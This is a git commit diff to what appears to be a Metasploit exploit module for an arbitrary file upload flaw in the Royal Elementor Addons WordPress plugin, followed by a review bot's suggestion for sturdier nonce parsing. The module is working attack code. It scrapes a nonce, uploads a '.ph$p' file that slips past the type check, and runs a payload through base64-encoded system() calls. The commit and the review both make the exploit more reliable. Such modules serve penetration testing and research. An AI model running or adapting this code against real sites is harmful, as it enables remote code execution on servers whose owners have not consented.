Add suggested changes
This commit is contained in:
parent
31daaf58fe
commit
65ea1188e2
|
@ -59,3 +59,4 @@ bookingpress
|
||||||
paid-memberships-pro
|
paid-memberships-pro
|
||||||
woocommerce-payments
|
woocommerce-payments
|
||||||
file-manager-advanced-shortcode
|
file-manager-advanced-shortcode
|
||||||
|
royal-elementor-addons
|
||||||
|
|
|
@ -32,6 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Targets' => [['Automatic', {}]],
|
'Targets' => [['Automatic', {}]],
|
||||||
'DisclosureDate' => '2023-11-23',
|
'DisclosureDate' => '2023-11-23',
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
'DefaultOptions' => {
|
||||||
|
'SSL' => true,
|
||||||
|
'RPORT' => 443
|
||||||
|
},
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Notes' => {
|
'Notes' => {
|
||||||
'Stability' => [CRASH_SAFE],
|
'Stability' => [CRASH_SAFE],
|
||||||
|
@ -40,12 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options([
|
|
||||||
OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
|
|
||||||
OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
|
|
||||||
Opt::RPORT(443)
|
|
||||||
])
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -56,13 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
|
check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
|
||||||
|
|
||||||
if check_code.code == 'appears'
|
if check_code.code != 'appears'
|
||||||
plugin_version = check_code.details[:version]
|
return CheckCode::Safe
|
||||||
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
|
||||||
return CheckCode::Appears
|
|
||||||
end
|
end
|
||||||
|
|
||||||
return CheckCode::Safe
|
plugin_version = check_code.details[:version]
|
||||||
|
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
||||||
|
return CheckCode::Appears
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -74,15 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
data = {
|
data = {
|
||||||
'action' => 'wpr_addons_upload_file',
|
'action' => 'wpr_addons_upload_file',
|
||||||
'max_file_size' => 0,
|
'max_file_size' => rand(10001),
|
||||||
'allowed_file_types' => 'ph$p',
|
'allowed_file_types' => 'ph$p',
|
||||||
'triggering_event' => 'click',
|
'triggering_event' => 'click',
|
||||||
'wpr_addons_nonce' => nonce
|
'wpr_addons_nonce' => nonce
|
||||||
}
|
}
|
||||||
|
|
||||||
file_content = '<?php '
|
file_content = '<?php '
|
||||||
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
|
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")
|
||||||
file_content << ' ?>'
|
file_content << '?>'
|
||||||
|
|
||||||
file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
|
file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
|
||||||
|
|
||||||
|
@ -128,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
|
fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
|
||||||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
|
fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
|
||||||
|
|
||||||
match = res.body.match(/var\s+WprConfig\s*=\s*({.*?});/)
|
match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
|
||||||
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
|
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
|
||||||
|
|
||||||
nonce = JSON.parse(match[1])['nonce']
|
nonce = JSON.parse(match[1])['nonce']
|
||||||
|
|
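Review bot: The `JSON.parse(match[1])['nonce']` call on the last line of the hunk is unguarded; because the tightened capture `{.+?}` is still non-greedy, it stops at the first `};` it meets, and if the inlined WprConfig object contains nested objects or a `};` inside a string value the truncated text raises JSON::ParserError and the module aborts with a backtrace rather than a fail_with. The `match[1].nil?` half of the preceding check is dead, since group 1 always participates when the regex matches, while the case that actually matters — a parsed object without a `nonce` key — is not checked and silently yields nil. Rescue the parse error and verify the key before using it. The enclosing method starts outside the hunk.
```ruby
match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil?

begin
  config = JSON.parse(match[1])
rescue JSON::ParserError => e
  fail_with(Failure::UnexpectedReply, "Could not parse WprConfig from the response: #{e.message}")
end

nonce = config['nonce']
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if nonce.to_s.empty?
```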